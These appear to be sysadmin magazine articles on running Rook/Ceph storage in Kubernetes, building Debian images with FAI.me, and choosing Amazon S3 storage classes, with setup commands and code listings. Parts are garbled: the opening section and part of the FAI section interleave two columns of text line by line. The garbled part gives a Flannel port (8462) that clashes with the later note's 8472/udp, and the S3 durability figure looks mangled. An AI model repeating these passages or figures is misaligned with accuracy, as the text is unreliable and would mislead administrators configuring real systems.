this differently so as not to lose the not strictly necessary, but a Kuber- OpenStack, for which an entire
Kubernetes controller in case of a netes cluster rolled out with kubeadm software-defined networking suite has
problem. needs a network plugin compatible to be tamed, you still have to load a
On the Kubernetes master, which with the Container Network Interface network plugin: After all, containers
is referred to as the Control Plane standard (more on this later). First, without a network don’t make much
Node in Kubernetes-speak, ports you should note that the output from sense.
6443, 2379-2380, 10250, 10251, and kubeadm init contains several com- The easiest way to proceed is to use
10252 must be accessible from the mands that will make your life easier. Flannel [4], which requires some ad-
outside. Also, disable the swap In particular, you should make a note ditional steps. On all your systems,
space on all the systems; otherwise, of the kubeadm join command at the run the following command to route
the Kubelet service will not work re- end of the output, because you will IPv4 traffic from bridges through
liably on the target systems (Kubelet use it later to add more nodes to the iptables:
is responsible for communication cluster. Equally important are the
between the Control Plane and the steps used to create a folder named # sysctl U
target system). .kube/ in your personal folder, in net.bridge.bridge-nf-call-iptables=1
which you store the admin.conf file.
Install CRI-O Doing so then lets you use Kuber- Additionally, all your servers need
netes tools without being root. Ide- to be able to communicate via ports
To run Kubernetes, the cluster sys- ally, you would want to carry out this 8285 and 8462. Flannel can then be
tems need a container run time. Until step immediately. integrated on the Control Plane:
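Note that the bridge setting is already made persistent by the /etc/sysctl.d/99-kubernetes-cri.conf file from Listing 1. What remains is making sure the two Flannel ports, which are UDP, are actually reachable if a host firewall is active. A quick sketch with ufw (substitute your firewall of choice):

# Flannel's udp backend uses 8285/udp; the default vxlan backend uses 8472/udp
sudo ufw allow 8285/udp
sudo ufw allow 8472/udp

# verify that the bridge sysctl survived the configuration steps
sysctl net.bridge.bridge-nf-call-iptables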


How Ceph Works

To help understand how Rook is deployed in the overall context of Ceph (Figure 1), I will review only the most important details here.
Ceph is based on the principle of object storage. It treats any content that a user uploads to Ceph as a binary object. Advantageously, objects can be separated, distributed, and reassembled at will, as long as everything happens in the correct order. In this way, object storage bypasses the limitations of traditional block storage devices, which are always inextricably linked to the medium to which they belong.
The object store at the heart of Ceph is RADOS, which implicitly provides redundancy and multiplies every piece of uploaded information as often as the administrative policy defines. Moreover, RADOS has self-healing capabilities. For example, if a single hard disk or SSD fails, RADOS notices and creates new copies of the lost objects in the cluster after a configurable tolerance time.
At least two services run under the RADOS hood: object storage daemons (OSDs) and monitoring servers (MONs). OSDs are the storage silos in Ceph. These block devices store the user data. More than half of the MON guard dogs must always be active and working in the cluster; in this way, the cluster can achieve a quorum.
If a Ceph cluster splits into several parts (e.g., a switch fails), you would otherwise be in danger of uncoordinated write operations on the individual partitions of the cluster. This split-brain scenario is a horror story for any storage admin, because it always means you have to discard the entire cluster database. After doing so, you can only import the latest backup. However, Ceph clusters are typically no longer completely backed up because of their size, so recovery from a backup would also be problematic if worst came to worst.

CephFS

Out of the box, Ceph offers three front ends for client access. The Ceph block device supports access to a virtual hard disk (image) in Ceph as if it were a block device and can be implemented with either the Linux kernel module RBD or by Librbd in userspace.
Another option envisages access through a REST interface, similar to Amazon S3. Precisely this protocol is supported by Ceph's REST interface, the Ceph Object Gateway – in addition to the Swift OpenStack protocol. What RBD and Ceph Object Gateway have in common is that they get along with the OSDs and MONs in RADOS.
The situation is different with the CephFS POSIX filesystem, for which a third RADOS service is required: the metadata server (MDS), which reads the POSIX metadata stored in the extended user attributes of the objects and delivers the data directly to its clients as a cache.

Figure 1: Ceph offers several interfaces, including a block device, a REST interface, and a POSIX filesystem. © Inktank

Flannel can then be integrated on the Control Plane:

# kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/2140ac876ef134e0ed5af15c65e414cf26827915/Documentation/kube-flannel.yml

This command loads the Flannel definitions directly into the running Kubernetes Control Plane, making them available for use.

Rolling Out Rook

As a final step, run the kubeadm join command generated previously by kubeadm init on all nodes of the setup except the Control Plane. Kubernetes is now ready to run Rook.
Thanks to various preparations by Rook developers, Rook is just as easy to get up and running as Kubernetes. Before doing so, however, it makes sense to review the basic architecture of a Ceph cluster. Rolling out the necessary containers with Rook is not rocket science, but knowing what is actually happening is beneficial. To review the basics of Ceph and how it relates to Rook, see the box "How Ceph Works."
To roll out Rook (Figure 2) in Kubernetes, you need OSDs and MONs. Rook makes it easy, because the required resource definitions can be taken from the Rook source code in a standard configuration. Custom Resource Definitions (CRDs) are used in Kubernetes to convert the local hard drives of a system into OSDs without further action by the administrator. In other words, by applying the ready-made Rook definitions from the Rook Git repository to your Kubernetes instance, you automatically create a Rook cluster with a working Ceph that utilizes the unused disks on the target systems.
Experienced admins might now be thinking of using the Kubernetes Helm package manager for a fast rollout of the containers and solutions. However, it would fail because Rook only packages the operator for Helm, but not the actual cluster.
Therefore, your best approach is to check out Rook's Git directory locally (Listing 3). In the newly created ceph/ subfolder are two files worthy of note: operator.yaml and cluster.yaml (see also "The Container Storage Interface" box).


Listing 3: Applying Rook Definitions

# git clone https://github.com/rook/rook.git
# cd rook/cluster/examples/kubernetes/ceph
# kubectl create -f operator.yaml
# kubectl get pods -n rook-ceph-system
# kubectl create -f cluster.yaml

With kubectl, first install the operator, which enables the operation of the Ceph cluster in Rook. The kubectl get pods command lets you check the rollout to make sure it worked: The pods should be set to Running. Finally, the actual Rook cluster is rolled out with the cluster.yaml file.
A second look should now show that all Kubelet instances are running rook-ceph-osd pods for the local hard drives and that rook-ceph-mon pods are running, but not on every Kubelet instance. Out of the box, Rook limits the number of MON pods to three because that is considered sufficient.

Figure 2: Rook sits between Ceph and Kubernetes and takes care of Kubernetes administration almost completely automatically. © Rook

The Container Storage Interface

Kubernetes is still changing fast – not least because many standards around container solutions are just emerging or are now considered necessary. For some time, the Container Storage Interface (CSI) standard for storage plugins has been in place. CSI is now implemented throughout Kubernetes, but many users simply don't use it yet.
The good news is that CSI works with Rook. The Rook examples also include an operator-with-csi.yaml file, which you can use to roll out Rook with a CSI connection instead of the previously mentioned operator.yaml. In the ceph/csi/ folder of the examples you will find CSI-compatible variants for the Ceph block device and CephFS, instead of the non-CSI variants used here. If you are rolling out a new Kubernetes cluster with Rook, you will want to take a closer look at CSI.

Integrating Rook and Kubernetes

Some observers claim that cloud computing is actually just a huge layer cake. Given that Rook introduces an additional layer between the containers and Ceph, maybe they are not that wrong, because to be able to use the Rook and Ceph installation in Kubernetes, you have to integrate it into Kubernetes first, independent of the storage type provided by Ceph. If you want to use CephFS for storage, it requires different steps than if you are using the Ceph Object Gateway.
The classic way of using storage, however, has always been block devices, on which the example in the next step is based. In the current working directory, after performing the above steps, you will find a storageclass.yaml file. In this file, replace size: 1 with size: 3 (Figure 3).

Figure 3: When creating a storage class in production for the Ceph Object Gateway, you should change size to 3.

In the next step, you use kubectl to create a pool in Ceph. In Ceph-speak, pools are something like name tags for binary objects used for the internal organization of the cluster. Basically, Ceph relies on binary objects, but these objects are assigned to placement groups. Binary objects belonging to the same placement group reside on the same OSDs. Each placement group belongs to a pool, and at the pool level the size parameter determines how often each individual placement group should be replicated.


In fact, you determine the replication level with the size entry (1 would not be enough here). The mystery remains as to why the Rook developers do not simply adopt 3 as the default.
As soon as you have edited the file, issue the create command; then, display the new rook-block storage class:

kubectl create -f storageclass.yaml
kubectl get sc -a

From now on, you have the option of organizing a Ceph block device from within the working Ceph cluster, which relies on a persistent volume claim (PVC) (Listing 4).

Listing 4: PVC for Kubernetes

kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: lm-example-volume-claim
spec:
  storageClassName: rook-block
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 10Gi

In a pod definition, you then only reference the storage claim (lm-example-volume-claim) to make the volume available locally.

Using CephFS

In the same directory is the filesystem.yaml file, which you will need if you want to enable CephFS in addition to the Ceph block device; the setup is pretty much the same for both. As the first step, you need to edit filesystem.yaml and correct the value for the size parameter again, which – as you know – should be set to 3 for both dataPools and metadataPool (Figure 4).

Figure 4: When creating the storage class for CephFS, you again need to change the size parameter from 1 to 3 for production.

To create the custom resource definition for the CephFS service, type:

kubectl create -f filesystem.yaml

To demonstrate that the pods are now running with the Ceph MDS component, look at the output from the command:

# kubectl -n rook-ceph get pod -l app=rook-ceph-mds

Like the block device, CephFS can be mapped to its own storage class, which then acts as a resource for Kubernetes instances in the usual way.

What's Going On?

If you are used to working with Ceph, the various tools that provide insight into a running Ceph cluster can be used with Rook, too. However, you do need to launch a Pod especially for these tools in the form of the Rook Toolbox. A CRD definition for this is in the Rook examples, which makes getting the Toolbox up and running very easy before connecting to Rook:

# kubectl create -f toolbox.yaml
# kubectl -n rook-ceph exec -it $(kubectl -n rook-ceph get pod -l "app=rook-ceph-tools" -o jsonpath='{.items[0].metadata.name}') bash

The usual Ceph commands are now available. With ceph status, you can check the status of the cluster; ceph osd status shows how the OSDs are currently getting on; and ceph df checks how much space you still have in the cluster. This part of the setup is therefore not specific to Rook.

Conclusions

Rook in Kubernetes provides a quick and easy way to get Ceph up and running and use it for container workloads. Unlike OpenStack, Kubernetes is not multiclient-capable, so the "one big Ceph for all" approach is far more difficult to implement than with OpenStack. For this reason, admins tend to roll out many individual Kubernetes instances instead of one large one. Rook is ideal for exactly this scenario, because it relieves the admin of a large part of the work: maintaining the Ceph cluster.
Rook version 1.x [5] is now available and is considered mature for deployment in production environments. Moreover, Rook is now an official Cloud Native Computing Foundation (CNCF) project; thus, it is safe to assume that many more practical features will be added in the future.

Info
[1] Rook: [https://rook.io]
[2] "Cloud-native storage for Kubernetes with Rook" by Martin Loschwitz, ADMIN, issue 49, 2019, pg. 47: [http://www.admin-magazine.com/Archive/2019/49/Cloud-native-storage-for-Kubernetes-with-Rook/]
[3] CRI-O: [https://cri-o.io]
[4] Flannel: [https://github.com/coreos/flannel]
[5] Rook versions: [https://github.com/rook/rook/releases]


Build operating system images on demand

Assembly Line
If you are looking for a way to build images quickly and easily, FAI.me is the place to go. By Martin Loschwitz

In popular clouds, the providers usually roll out standard distribution images. SUSE, Red Hat, and Canonical offer these explicitly, and there is no reason why you should not use them. However, these images may have one or two annoying features, such as missing packages, wrong configurations, or other everyday difficulties.
Changing a finished image is not trivial. Instead, many admins start rebuilding from the source and, sooner or later, give up. In most cases it is not possible to achieve the same image quality as that of the distributors. Either the DIY images are bulky and far too big or they don't work well.
This problem is exactly what FAI.me addresses: The tool is an extension of the Fully Automated Installer (FAI; see also the "FAI Review" box) [1] that builds operating system (OS) images on demand, for both bare metal and use in the cloud. In this article, I introduce FAI.me and explain what happens in the background.

Instant Images

FAI.me provides the functionality of FAI without the kind of tinkering that's otherwise necessary. Basically, it's not much more than a graphical web-based interface for fai-diskimage, which assembles bootable OS images on demand. Images for bare metal installations as well as for clouds are included, but FAI.me offers a whole host of extremely practical functions.
Naturally, the bootable FAI images for bare metal differ significantly from the cloud images. The one contains the normal FAI installer, which starts its work after launching from the boot medium, whereas the cloud version comes with a pre-installed operating system. To take this into account, Lange has implemented FAI.me on two subpages on the FAI website for cloud images [3] and bare metal [4]. Both pages are quite straightforward.

Clouds

If you look at the cloud page, you only have a few – really important – parameters to set. At the very top of the form, for example, you need to enter both the target size of the image and its format. The background to this is that if you build an image for AWS, it needs a different format than for KVM, which usually wants the QCOW2 format for hard drives.
You can define the hostname, but it is usually overwritten by the software-defined networks in clouds and their name resolution.
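If an image ends up in the wrong format for its target, you do not have to rebuild it from scratch: the qemu-img utility converts between raw and QCOW2. The file names below are just examples.

# convert a raw image into QCOW2 for use with KVM/libvirt
qemu-img convert -f raw -O qcow2 disk.raw disk.qcow2

# inspect the result (virtual size, format, backing file)
qemu-img info disk.qcow2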


FAI Review

A short review of FAI will help you understand FAI.me. Although FAI is not new, the author Thomas Lange is continuously adding new features. Moreover, a small but hard-working community has gathered around the tool, keeping it up to date and ensuring that it can install Ubuntu and CentOS in addition to Debian.
The original purpose of FAI was clearly defined: After unpacking, new servers install autonomously to the extent possible and without too much manual intervention. Quite remarkably, FAI was created back in the late 1990s, long before automation tools such as Puppet or Ansible existed.
FAI offered the ability to roll out an OS automatically at an early stage. In the standard configuration, it combines a number of different protocols. A DHCP server is supported by a TFTP server. Clients use the PXE protocol to obtain an IP and then load a bootloader via TFTP. A kernel, usually one from the installation routine, is responsible for taking care of the rest.
The program needs PXE to boot into a custom environment where it can roll out its various operating systems. Lange and volunteer FAI developers have implemented many features for this purpose. Scripts can be executed at different stages of the installation, which then implement certain functions not provided out of the box in FAI. All FAI components can be loaded from a central network server for this purpose.
The highlight is that FAI does not depend on the installation routine of an installer. If you want to implement automation for SUSE, CentOS, and Debian, you would theoretically have to create three boot environments: for AutoYaST, Kickstart, and preseeding. FAI offers a mostly generic interface. Only local modifications, such as the selection of the packages to be installed automatically, add pitfalls because not all packages for the same components have identical names across distributions.
Lange recognized early on that dependence on the network can be quite disadvantageous. Conceivably a DHCP server may exist, but it then takes some time to integrate with FAI – or DHCP is not allowed at all. Maybe the systems you want to install just can't use PXE – not all network cards come with support for this protocol. However, the network boot in FAI will not work without a network either.
For many years, FAI has supported the possibility of generating a static image from a precomposed FAI configuration, which you can then burn to a CD-ROM or DVD or write to a USB stick. The local boot medium then behaves exactly as a network-based FAI, but with a few system-related limitations: If you change the FAI configuration, you have to create new images afterward.
In the first years of FAI's existence, this function was limited to generating images for bare metal, but now FAI also provides functions for building images for cloud environments. Taking Debian as an example, the command

fai-diskimage -u cloudhost -S900M -cDEFAULT,DEBIAN,AMD64,FAIBASE,DEMO,GRUB_PC,CLOUD /tmp/disk

creates an image of an installed Debian system built for the AMD64 architecture in /tmp/disk; it contains the GRUB bootloader and needs 900MB of storage space (Figure 1). If you have fast Internet access on the system on which you call the fai-diskimage command, the process is also quick. It hardly takes a minute for the finished image to become available. Debian is happy to have the tool, because, among other things, the project uses it to create its official images for the cloud [2].

Figure 1: fai-diskimage creates a cloud image based on an existing FAI configuration.
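Before uploading such an image into a cloud, a quick local smoke test is worthwhile. Assuming the image was built in raw format, as in the example above, QEMU boots it directly; the 2GB of RAM is an arbitrary choice.

# boot the freshly built image locally for a quick check
# (drop -enable-kvm if the build host has no KVM support)
qemu-system-x86_64 -enable-kvm -m 2048 -drive file=/tmp/disk,format=raw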

to a cloud image, you don’t have to FAI.me just wants to know which able for use in OpenStack, have man-
specify it when starting the virtual packages it should integrate into the aged with around 260MB for years.
machine. image. Best be economical here: As
If you want to set a password for root, a rule, clouds are connected by fast Bare Metal
you can, but I strongly advise against lines, so it is advisable to keep the
it. Leaving the field empty is one less basic image as small as possible and If you want to build an image for use
attack vector, and it doesn’t mean hav- load the rest off the network or a lo- on bare metal instead, the effort is not
ing to do without root rights thanks to cal mirror as needed. much greater. Although a separate op-
sudo. If you then set the desired lan- The big distributors demonstrate this tion displays the advanced settings, it
guage and the release you want to use, vividly. The Ubuntu images, for ex- only takes you to the settings for the
you are virtually ready to start. ample, which Canonical makes avail- root password and lets you add a pub-
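If you do not have a keypair at hand to paste into the form, generating one only takes a moment; the public half (the .pub file) is what FAI.me expects. The file name is merely a suggestion.

# create a new keypair for images built with FAI.me
ssh-keygen -t ed25519 -f ~/.ssh/faime_key -C "faime image key"

# print the public key for copy and paste into the web form
cat ~/.ssh/faime_key.pub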


FAI assumes by default that it will create a user with a password, who then becomes root with sudo.
You can specify the partition scheme in a drop-down menu. FAI.me provides several suggestions for the use of the Logical Volume Manager or /home on your own partition. The remaining settings largely correspond to those of the cloud variant.

Push-Button Image

Whether you want an image for bare metal or for the cloud, at the end of the process, pressing the button at bottom left for creating the image is all it takes to start the automatic image building process (Figures 2 and 3). After a short wait, the browser then starts downloading the image, which can then be used on a USB stick, on a CD/DVD, or in the cloud.

Figure 2: FAI.me creates images for the cloud in QCOW2 or AWS format or …
Figure 3: … installation images that equip a physical host with an operating system.

As mentioned, no hocus-pocus is taking place in the background; instead, the web interface calls fai-cd and fai-mirror or fai-diskimage behind the scenes and creates a matching image on the fly. Therefore, you can be absolutely sure that you always get the packages for the latest Debian GNU/Linux.
Unlike the big distributors, you decide when to build the image, although it means not using an official image, but one you build yourself with FAI.me. What Lange originally intended as a showcase for FAI and to give users an understanding of FAI's range of functions is itself a very practical tool.

Your Own Image Factory

To recap, FAI.me has virtually no functionality of its own. The tool uses a preconfigured FAI installation in the background to build images on demand in line with FAI standards, which is the solution to a problem that many cloud providers face. Prebuilt cloud images are fine, but sometimes you need local modifications. If you offer special hardware in your cloud and want to pass it through to your users, you find yourself regularly building your own images.
As explained in the "Images or Automation?" box, this question is not trivial, especially if you don't have the right toolset at hand. FAI and FAI.me, on the other hand, have proven to be very useful tools that can quickly form the basis of a local image factory that automatically outputs state-of-the-art disk images with special local modifications.

How It Works

To begin, you first set up FAI as if you wanted to use it for the live installation of nodes. Factors like DHCP can be ignored – the purpose is to create bootable media.
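On the command line, that part of the workflow looks roughly like the sketch below. The mirror path, the class list, and /dev/sdX are placeholders, and the exact options of fai-mirror and fai-cd vary between FAI releases, so check the man pages of your installed version.

# collect the packages for the classes used in the config space (placeholders)
sudo fai-mirror -v -cDEFAULT,DEBIAN,AMD64,FAIBASE /srv/fai/mirror

# master a bootable installer ISO from the configured FAI setup and that mirror
sudo fai-cd -m /srv/fai/mirror /tmp/fai-installer.iso

# write the ISO to a USB stick; make sure /dev/sdX really is the stick
sudo dd if=/tmp/fai-installer.iso of=/dev/sdX bs=4M status=progress conv=fsync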


After that, you already have the option to create your own images with fai-cd and fai-diskimage. But that's only half the battle. Users actually want to have this image build embedded in a CI/CD process to ensure that images are automatically built when changes are made to the FAI configuration and that the images are then available for download from a central location.
Therefore, connecting FAI to a CI/CD tool such as Jenkins is a good idea, and this is exactly what the Debian project does. It stores its FAI configuration in Debian GitLab and uses hooks to wire it to an FAI installation in such a way that the described mechanism is implemented. When a commit ends up in the master branch of the repository, GitLab then ensures that new images are created automatically.
If you prefer not to overwrite the old images automatically, the recommendation is to encode the date in the name. The example with GitLab, in particular, is not difficult to set up if you make sure that GitLab has a virtual machine on which FAI is executable and that can access the GitLab repository itself to build images according to FAI rules.
Instead of laboriously developing an image factory yourself, it could be a good idea to turn to FAI, especially if the target system is Debian, with which FAI is particularly connected through its author.

Images or Automation?

On the basis of my own experience, FAI.me triggers two reactions that could hardly be more different. On the one hand, enthusiastic admins have needed a tool like this and had not yet found it. On the other hand, more conventional admins with backgrounds in automation have turned up their noses.
A conflict comes to light that plays an important role in contemporary IT. Does it make more sense to work with operating system images, or should you instead rely on the vendor's installation tools and use automation to make the required adjustments? Although this discussion is undoubtedly still in full sway, many assumptions and fears are based on obsolete knowledge.
Admins are absolutely right when they warn against monster images that cannot be regenerated when you need them. Companies commonly find that a golden master image for the installation of new systems has "grown historically": It works, but nobody in the company knows exactly what it contains. When a new image has to be built, it often involves massive overhead and consumes a huge amount of time.
The same applies to images you can pick up from alternative "black box" sources from the Internet. One thing you do not want in your data center is a pre-owned image with a built-in Bitcoin miner, although this is mostly discovered in the context of container images. However, the same caveat naturally also applies to images of entire operating systems.
By the way, when many admins think of images, they think of bare metal deployments. Because the local variance in this area is much higher than in defined environments such as KVM or VMware, many people in the past believed that monster images were legitimate or even necessary.
Like with a pendulum, a countermovement of tinkerers categorically rejects OS images. Instead, its proponents say you should install Linux on your hard disk with AutoYaST, Kickstart, the Debian preseeding method, or whatever your distribution uses as an automatic installation tool. According to this narrative, then, the automation engineer handles the rest of the work.
However, this problem is easy to work around: Continuous integration and continuous delivery/deployment (CI/CD) environments based on Jenkins offer the ability to build OS images completely automatically. Of course, FAI.me is also an approach to circumventing precisely the problem described. If you use FAI.me to build your images, you can understand the process in detail, and if you so desire, you can also run FAI.me in an instance of its own, which then contains local modifications – but in a comprehensible way.
The images built with FAI.me can just as easily be frugal operating system images that simply prepare a host for use with Puppet, Ansible, or some other automation system. By the way, this is more elegant by several orders of magnitude than the automation structures that some administrators build themselves with scripting in Kickstart or AutoYaST or by preseeding.
One thing should be clear by now: Nothing works without operating system images. They are essential in clouds because virtual instances cannot be built and started without them. Installers from distributions are simply not viable alternatives, because the current clouds do not support the PXE boot functionality required in the first place.
In the end, as is often the case, a whole range of gray tones exist, and those admins who find a perfect mix of images on the one hand and automation on the other, will have a pleasing result. FAI.me is a promising and well-proven component in such a context.

Conclusions

For many admins, building operating system images is an unnecessarily complicated exercise that requires a huge amount of preparation. FAI shows another way: By combining the appropriate parameters for fai-diskimage or fai-cd and fai-mirror, it builds generic disk images at the command line in a very short time.
However, FAI itself cannot be set up easily and quickly. Anyone planning to install dozens, hundreds, or even thousands of systems automatically with this solution will be happy to put up with the overhead of the initial FAI installation: It's guaranteed to pay dividends. Each new server that is installed in this way then reduces the total overhead and pays for itself.
If you just want a sample of the FAI atmosphere, FAI.me is the right place to start. In a very short time, you can build disk images for Debian that still offer some leeway for local customizations. FAI.me is therefore a very useful extension to FAI itself and worth exploring.

Info
[1] "Automatically install and configure systems" by Martin Loschwitz, ADMIN, issue 52, 2019, pg. 62: [http://www.admin-magazine.com/Archive/2019/52/Automatically-install-and-configure-systems]
[2] Debian cloud images: [https://salsa.debian.org/cloud-team/debian-cloud-images]
[3] FAI.me for cloud images: [https://fai-project.org/FAIme/cloud]
[4] FAI.me for installation images: [https://fai-project.org/FAIme]


New storage classes for Amazon S3

Class Society
Each Amazon storage class addresses a different usage profile; we examine the new classes to help you make
the right choice. By Thomas Drilling

AWS introduced several new storage services and databases at re:Invent 2018, including new storage classes for Amazon Simple Storage Service (S3). In the meantime, new releases (S3 Intelligent-Tiering and S3 Glacier Deep Archive) have become available that quickly boost the number of storage classes in the oldest and most popular of all AWS services from three to six. In this article, I present the newcomers and their characteristics.

Amazon's Internet storage has always supported storage classes, between which users can choose when uploading an object and which they can also switch automatically later using lifecycle guidelines. The individual storage classes have different price models and availability classes, each of which optimally addresses a different usage profile. So, if you know the most common access patterns to your data stored in S3, you can optimize costs by intelligently choosing the right storage class.

High-Availability SLAs

The individual storage classes differ in terms of availability and durability. Amazon S3 is basically a simple, key-based object store, and AWS generally replicates the data within a region (with the exception of the S3 One Zone-IA class) across all availability zones. Amazon S3, for example, offers 99.99 percent availability in the standard storage class and 99.999999999 percent durability, which means that of 10,000 stored files, one file is lost every 11 million years, on average. AWS even guarantees this under its Amazon S3 Service Level Agreement [1]. By the way, such a service is by no means available for all AWS services.

The new S3 Intelligent-Tiering storage class also has a durability of 99.999999999 percent with an availability of 99.9 percent, just as in the S3 Standard-IA class. In the case of the S3 One Zone-IA storage class, however, replication only takes place within a single availability zone, resulting in a reduced availability of 99.5 percent. Replication beyond regions does not take place in AWS to further improve availability or consistency, because this would contradict the corporate philosophy with regard to data protection. However, the user can configure automatic replication to another region in S3 if so desired.
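Such cross-region replication can also be set up from the command line rather than the console. The following is only a minimal sketch with the AWS CLI: the bucket names, the IAM role ARN, and the file name replication.json are placeholder assumptions, and versioning must be enabled on both buckets before replication works:

# Versioning is a prerequisite for replication on source and target
aws s3api put-bucket-versioning --bucket my-source-bucket \
    --versioning-configuration Status=Enabled
aws s3api put-bucket-versioning --bucket my-target-bucket \
    --versioning-configuration Status=Enabled

# One rule that replicates every new object to the target bucket
cat > replication.json <<'EOF'
{
  "Role": "arn:aws:iam::123456789012:role/s3-replication-role",
  "Rules": [{
    "ID": "replicate-everything",
    "Status": "Enabled",
    "Priority": 1,
    "Filter": {},
    "DeleteMarkerReplication": { "Status": "Disabled" },
    "Destination": { "Bucket": "arn:aws:s3:::my-target-bucket" }
  }]
}
EOF
aws s3api put-bucket-replication --bucket my-source-bucket \
    --replication-configuration file://replication.json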


Table 1: Current S3 Storage Classes

Storage Class                  Suitable for                                                            Durability (%)   Availability (%)       Availability Zones
Standard                       Data with frequent access                                               99.999999999     99.99                  >=3
Standard-IA                    Long-term data with irregular access                                    99.999999999     99.9                   >=3
Intelligent-Tiering            Long-term data with changing or unknown access patterns                 99.999999999     99.9                   >=3
One Zone-IA                    Long-term, non-critical data with fairly infrequent access              99.999999999     99.5                   1
Glacier                        Long-term archiving with recovery times between minutes and hours       99.999999999     99.99 (after restore)  >=3
Glacier Deep Archive           Data archiving for barely used data with a recovery time of 12 hours    99.999999999     99.99 (after restore)  >=3
RRS (no longer recommended)    Frequently retrieved, but non-critical data                             99.99            99.99                  >=3
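The lifecycle guidelines mentioned above, which move objects between these classes automatically, can be defined with a single CLI call. A minimal sketch follows; the bucket name mybucket, the rule ID, and the transition days are placeholder assumptions, not recommendations:

# Move objects to Standard-IA after 30 days and to Glacier Deep Archive
# after one year, applied to the whole bucket
cat > lifecycle.json <<'EOF'
{
  "Rules": [{
    "ID": "tier-down-old-objects",
    "Status": "Enabled",
    "Filter": {},
    "Transitions": [
      { "Days": 30,  "StorageClass": "STANDARD_IA" },
      { "Days": 365, "StorageClass": "DEEP_ARCHIVE" }
    ]
  }]
}
EOF
aws s3api put-bucket-lifecycle-configuration --bucket mybucket \
    --lifecycle-configuration file://lifecycle.json

# Verify the rule that is now active
aws s3api get-bucket-lifecycle-configuration --bucket mybucket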

Comparison of Storage Classes

Although S3 made do with three storage classes – Standard, Standard-IA, and Glacier – for many years, three additional storage classes are now available: Intelligent-Tiering, One Zone-IA, and Glacier Deep Archive, all with a durability of 99.999999999 percent. The documentation still also lists the Standard with Reduced Redundancy (RRS) storage class with a durability of 99.99 percent. Currently, AWS does not recommend the use of RRS – originally intended for non-critical, reproducible data such as thumbnails – because the standard storage class is now cheaper anyway. As Table 1 shows, the inclusion of RRS would mean that there are seven storage classes.

Amazon S3 Costs

Apart from the fact that prices for all AWS services generally vary between regions, S3 storage has four cost drivers: storage (storage prices), retrieval (retrieval prices), management (S3 storage management), and data transfer, where moving data to the cloud does not cost anything. In US East regions, for example, the S3 Standard storage class pricing (in early 2020) looks like this:
- The storage price is $0.023/GB for the first 50TB.
- The retrieval price is $0.005/1,000 PUT, COPY, POST, or LIST requests and $0.0004/1,000 for GET, SELECT, and all other requests. All data returned by S3 is charged at $0.0007/GB, all data scanned at $0.002/GB. Lifecycle transition and retrieval requests are free, as are DELETE and CANCEL requests.
- The price of S3 storage management depends on the functions included. For example, S3 object tagging costs $0.01/10,000 tags per month.
- For outgoing transmissions, AWS allows up to 1GB/month free of charge. The next 9.999TB/month is charged at $0.09/GB, the next 40TB/month at $0.085/GB, the next 100TB/month at $0.07/GB, and the next 150TB/month at $0.05/GB.
A complete price overview can be found on the S3 product page [2].

S3 with Intelligent Gradation

The new Intelligent-Tiering storage class is primarily designed to optimize costs. This approach works because AWS continuously analyzes the data for access patterns and automatically transfers the results to the most cost-effective access level. The two target storage classes involved in intelligent tiering are Standard and Standard-IA. As you may know, storage is cheaper in Standard-IA, but retrieval is more expensive. Although retrieval is possible at any time with the same access time and latency, the AWS pricing for this storage class stipulates that the objects are rarely read after the initial write.

For this automation, however, AWS charges an additional monthly monitoring and automation fee per object. Specifically, S3 Intelligent-Tiering monitors the access patterns of the objects and moves objects that have not been accessed for 30 days in succession to Standard-IA. If an object in Standard-IA is accessed, AWS automatically moves it back to S3 Standard. There are no retrieval fees when using S3 Intelligent-Tiering, and no additional grading fees are charged when objects switch between access levels. This makes the class particularly suitable for long-term data with initially unknown or unpredictable access patterns.

Assigning Storage Classes

S3 storage classes are generally configured and applied at the object level, so the same bucket can contain objects stored in S3 Standard, S3 Standard-IA, S3 Intelligent-Tiering, or S3 One Zone-IA. Glacier Deep Archive, on the other hand, is a service in its own right. Users can upload objects to the storage class of their choice at any time or use S3 lifecycle guidelines to transfer objects from S3 Standard and S3 Standard-IA to S3 Intelligent-Tiering. For example, if the user uploads a new object into a bucket via the S3 GUI, they can simply select the desired storage class with the mouse (Figure 1).

When uploading from the CLI, the storage class is given as a parameter, --storage-class. The values STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA,


INTELLIGENT_TIERING, GLACIER, and DEEP_ARCHIVE are permitted, for example:

aws s3 cp s3://mybucket/Test.txt s3://mybucket2/ --storage-class STANDARD_IA

Figure 1: When uploading data to S3, the storage class can be selected via the user interface.

The same idea applies when using the REST API. Remember that Amazon S3 is a REST service. Users can send requests to Amazon S3 either directly through the REST API or, to simplify programming, by way of wrapper libraries for the respective AWS SDKs that encapsulate the underlying Amazon S3 REST API.

Therefore, users can send REST requests either in the context of the desired SDK or directly, where Amazon S3 uses the default storage class for storing newly created objects if the storage class is not specified explicitly with --storage-class.

Listing 1 shows an example of updating the storage class for an existing object in Java. Another example for uploading an object in Python 3 (with the Boto3 SDK) to the infrequently accessed storage class (Standard-IA) would look like:

import boto3
s3 = boto3.resource('s3')
s3.Object('mybucket', 'hello.txt').put(
    Body=open('/tmp/hello.txt', 'rb'),
    StorageClass='STANDARD_IA'
)

Listing 1: Updating the Storage Class

AmazonS3Client s3Client = (AmazonS3Client)AmazonS3ClientBuilder.standard().withRegion(clientRegion).withCredentials(new ProfileCredentialsProvider()).build();
CopyObjectRequest copyRequest = new CopyObjectRequest(sourceBucketName, sourceKey, destinationBucketName, destinationKey).withStorageClass(StorageClass.ReducedRedundancy);
s3Client.copyObject(copyRequest);

Cheap Storage with Glacier Deep Archives

Of the six main storage classes mentioned, only four can be queried directly at any time, because the Glacier and Glacier Deep Archive classes are not implemented in the S3 service with its concept of buckets and objects; instead, they map to Amazon's Glacier archive service which, as archive storage, offers the same durability. However, the retrieval times are configurable between a few minutes and several hours. Immediate retrieval is not possible. Instead, users need to post a retrieval order by way of the API, which eventually returns an archive from a vault. Like S3, the Glacier API is natively supported by numerous third-party applications.

However, one special feature of S3 and Glacier is that the archive service can also be controlled with a lifecycle guideline from the S3 API (Figure 2). Glacier can therefore be controlled either with the Glacier API or the S3 API. In the context of S3 lifecycle policies, for example, it has long been possible to transfer documents that are no longer read after a certain period of time but must be retained for a specific period because of corporate compliance guidelines to Glacier after the desired retention period in S3 Standard-IA.

